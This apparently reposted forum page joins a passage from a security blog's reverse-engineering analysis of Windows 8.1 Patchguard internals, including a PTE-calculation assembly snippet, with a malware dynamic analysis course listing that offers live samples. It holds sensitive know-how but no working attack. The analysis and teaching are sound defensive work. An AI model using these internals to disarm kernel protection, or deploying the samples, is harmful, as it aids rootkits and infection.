The last instruction clearly raises an exception because the value +128 doesn't fit in the destination 8-bit register AL (remember that we are speaking about signed integers). Following the SEH structures inside the Nt kernel file leads code execution to the "KiFilterFiberContext" routine. This is another procedure with a misleading name: all it does is disable a potential debugger, and prepare the context for the Patchguard initialization routine. The initialization routine of the Kernel Patch Protection technology is a huge function (95 KB of pure machine code) inside the INIT section of the Nt kernel binary file. From now on, we will call it "KiInitializePatchguard".
INTERNAL ARCHITECTURE, A QUICK GLANCE

The initialization routine builds all the internal Patchguard key data structures and copies all of its routines many times. The code of KiInitializePatchguard is very hard to follow and understand because it contains obfuscation, useless opcodes, and repeated chunks. Furthermore, it contains a lot of checks for the presence of a debugger. After some internal environment checks, it builds a huge buffer in the kernel nonpaged pool that contains all the data needed by Patchguard. This buffer is surrounded by a random number of 8-byte QWORD seed values repeatedly calculated with the "RDTSC" opcode.

Image: https://lh4.googleusercontent.com/oym_O5vcYyOXAlauXqrwRVVEt2rkj27OED4AwT90LsveJ6KfUbfFqh_lx-ZJxEasIVx_aTU6Fqdreh5pNm55yK5vPcS7xPM0TZ5VpWrotqJUjRsBEE9ax06G-N5_oa3aBA

As the reader can see from the above picture, the Patchguard buffer contains a lot of useful info. All the needed data is organized in 3 main sections:

Internal configuration data

The first buffer area, located after the TSC (time stamp counter) seed values, contains all the initial Patchguard-related configuration data. Noteworthy are the 2 Patchguard keys (the master one, used for all key calculations, and the decryption key), the Patchguard IAT (pointers to some Nt kernel functions), all the needed kernel data structure values (for example the KiWaitAlways symbol, the KeServiceDescriptorTable data structure, and so on…), the Patchguard verification work item, the 3 copied IDT entries (used to defeat the debug registers attack), and finally the various relocated internal Patchguard function offsets.

Patchguard and Nt vital routines code

This section is very important because it contains the copies of the pointers and the code of the most important Nt routines used by Patchguard to crash the system in case something wrong is found.
In this way, even if a rootkit tries to forge or block the crash routines, the Patchguard code can completely defeat the malicious patch and correctly crash the system. Here is the list of the copied Nt functions: HaliHaltSystem, KeBugCheckEx, KeBugCheck2, KiBugCheckDebugBreak, KiDebugTrapOrFault, DbgBreakPointWithStatus, RtlCaptureContext, KeQueryCurrentStackInformation, KiSaveProcessorControlState, and the HalHaltSystem pointer. Furthermore, the section contains the entire "INITKDBG" code section of the Nt kernel. This section implements the main Patchguard code:

- the Kernel Patch Protection main check routine and the first self-verification procedure
- the Patchguard work item routine and the system crash routine (which even erases the stack)
- the Patchguard timer and one entry point (there are many others, but not in the INITKDBG section)

Protected code and data

All the values and data structures used to verify the entire Nt kernel code reside here. The area is huge (227 KB, more or less) and it is organized in at least 3 different ways:

1. The first 2 KB contain an array of data structures that store the pointer, size, and relative calculated integrity key of the code (and data) chunks of all the Nt functions used by Kernel Patch Protection to correctly do its job.
2. The Nt kernel module ("ntoskrnl.exe") base address and its exception directory pointer, size and calculated integrity key. A big array of DWORD keys then follows: for each RUNTIME_FUNCTION entry of the module's exception directory there is a relative 4-byte key. In this manner Patchguard can verify each code chunk of the Nt kernel.
3. A copy of all Patchguard-protected data.
I still need to investigate the way in which the protected Patchguard data (like the global "g_CiOptions" symbol of the "CI.DLL" code integrity module, for example) is stored in memory, but we know for sure that the data is binary-copied into this section from its original location while the OS is starting.

VERIFICATION METHODS - Some Words

Describing the actual methods used to verify the integrity of the running operating system kernel is outside the scope of this article; we are only going to give an introduction. Kernel Patch Protection has some entry points scattered inside the kernel: 12 DPC routines, 2 timers, some APC routines, and others. When the Patchguard code acquires processor execution, it decrypts its buffer and then calls the self-verify routine. The latter function first verifies 0x3C0 bytes of the Patchguard buffer (including the just-executed decryption code), recalculating a checksum value and comparing it with the stored one. Then it performs the same verification as before, but for the Nt functions exploited by its main check routine. The integrity keys and verification data structures are stored at the start of area 3 of the Patchguard buffer. If one of the checks goes wrong, the Patchguard self-verify routine immediately crashes the system. It does this in a very clever manner: first it restores all the virtual memory structure values of the vital Nt kernel functions (like the page table entries, page directory entries and so on…). Then it replaces all the code with the copies located in the Patchguard buffer. In this way each eventual rootkit modification is erased, and as a result the Patchguard code can crash the system without any obstacles. Finally, it calls the "SdbpCheckDll" routine (another misleading name) to erase the current thread's stack and transfer execution to the KeBugCheckEx crash routine.
Otherwise, in the case that all the initial checks pass, the code queues a kernel work item, exploiting the standard ExQueueWorkItem kernel API (keep in mind that this function has already been checked by the previous self-verify routine). The Patchguard work item code immediately calls the main verification routine. It then copies its own buffer to another place, re-encrypts the old Patchguard buffer, and finally jumps to the ExFreePool kernel function. The latter procedure will delete the old Patchguard buffer. This way, every time a system check is raised, the Patchguard buffer location changes. The main check routine uses some other methods to verify each Nt kernel code and data chunk. Describing all of them, and the functionality of the main check routine, is deferred to the next blog post…

The code used by the Patchguard initialization routine to calculate the virtual memory data structure values is curious. Here is an example used to find the page table entry of a 64-bit memory address:

CalculatePteVa:
    shr rcx, 9              ; Original Ptr address >> 9
    mov rax, 98000000000h   ; The negated value is FFFFF680`00000000, or more
                            ; precisely "16 bits set to 1, the x64 auto-value,
                            ; all zeros"
    mov r15, 07FFFFFFFF8h
    and rcx, r15            ; RCX & 7FFFFFFFF8h (clear the 25 MSBs and the
                            ; last 3 LSBs)
    sub rcx, rax            ; RCX += FFFFF680`00000000
    mov rax, rcx            ; RAX = VA of PTE of target function

For an explanation of how it really works, and of the x64 0x1ED auto-value, I refer the reader to the following great book about x64 memory management: Enrico Martignetti - What Makes It Page? The Windows 7 (x64) Virtual Memory Manager (2012).

Conclusions

In this blog post we have analysed the Uroburos code that disables the old Windows 7 Kernel Patch Protection, and have given an overview of the new Patchguard version 8 implementation. The reader should now be able to understand why attacks such as the one used by Uroburos cannot work with the new version of Kernel Patch Protection.
It seems that the new implementation of this technology can defeat all known attacks. Microsoft engineers have done a great amount of work to try to mitigate this class of attacks. Because the Kernel Patch Protection is not hardware-assisted, and because its code runs at the kernel-mode privilege level (the same as all kernel drivers), it is not perfect. At an upcoming conference, I will demonstrate that a clever researcher can still disarm this new version, even if it is a more difficult task to accomplish. The researcher can furthermore use the original Microsoft Patchguard code even to protect his own hooks… Stay tuned!

Sursa: VRT: The Windows 8.1 Kernel Patch Protection
-
Creator: Veronica Kovah
License: Creative Commons: Attribution, Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/)
Class Prerequisites: None
Lab Requirements: Linux system with VirtualBox and a Windows XP VM.
Class Textbooks: "Practical Malware Analysis" by Michael Sikorski and Andrew Honig
Recommended Class Duration: 2-3 days
Creator Available to Teach In-Person Classes: Yes

Author Comments: This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: persisting, communicating, and hiding. We will achieve the items above by first learning the individual techniques sandboxes utilize. We will show how to capture and record registry, file, network, mutex, API, installation, hooking and other activity undertaken by the malware. We will create fake network responses to deceive malware so that it shows more behavior. We will also talk about how using MITRE's Malware Attribute Enumeration & Characterization (MAEC - pronounced "Mike") standard can help normalize the data obtained manually or from sandboxes, and improve junior malware analysts' reports. The class will additionally discuss how to take malware attributes and turn them into useful detection signatures such as Snort network IDS rules, or YARA signatures. Dynamic analysis should always be an analyst's first approach to discovering malware functionality. But this class will show the instances where dynamic analysis cannot achieve complete analysis, due to malware tricks for instance. So in this class you will learn when you will need to use static analysis, as offered in the follow-on Introduction to Reverse Engineering and Reverse Engineering Malware classes. During the course students will complete many hands-on exercises.
Course Objectives:
* Understand how to set up a protected dynamic malware analysis environment
* Get hands-on experience with various malware behavior monitoring tools
* Learn the set of malware artifacts an analyst should gather from an analysis
* Learn how to trick malware into exhibiting behaviors that only occur under special conditions
* Create actionable detection signatures from malware indicators

This class is recommended before a later class on malware static analysis, so that students understand both techniques and can utilize the one which gives the quickest answer to a given question. Every attempt was made to properly cite references, but if any are missing, please contact the author.

Class Materials
All Materials (.zip of odp (222 slides) & class malware examples)
All Materials (.zip of pdf (222 slides) & class malware examples)
Slides Part 1 (Background concepts, terms, tools & lab setup, 68 slides)
Slides Part 2 (RAT analysis (Poison Ivy), persistence & maneuvering (how the malware strategically positions itself on the system), 67 slides)
Slides Part 3 (Malware functionality (e.g. keylogging, phone home, security degradation, self-destruction, etc.), 43 slides)
Slides Part 4 (Using an all-in-one sandbox (Cuckoo), MAEC, converting output to actionable indicators of malware presence (e.g. Snort/YARA signatures), 44 slides)
Malware samples used in class.
Password is "infected"

HD Videos on Youtube
Full quality downloadable QuickTime, h.264, and Ogg videos at Archive.org:
Day 1 Part 1: Introduction (8:10)
Day 1 Part 2: Background: VirtualBox (5:56)
Day 1 Part 3: Background: PE Files & Packers (17:00)
Day 1 Part 4: Background: File Identification (15:44)
Day 1 Part 5: Background: Windows Libraries (4:27)
Day 1 Part 6: Background: Windows Processes (35:16)
Day 1 Part 7: Background: Windows Registry (18:07)
Day 1 Part 8: Background: Windows Services (25:52)
Day 1 Part 9: Background: Networking Refresher (27:38)
Day 1 Part 10: Isolated Malware Lab Setup (26:47)
Day 1 Part 11: Malware Terminology (6:50)
Day 1 Part 12: Playing with Malware: Poison Ivy RAT (30:54)
Day 1 Part 13: Behavioral Analysis Overview (5:30)
Day 1 Part 14: Persistence (34:54)

Day 2 will be posted Aug 24th. Day 3 was lost due to a video server malfunction. The class will be re-delivered at MITRE in September, and day 3 will be re-recorded then.

Sursa: MalwareDynamicAnalysis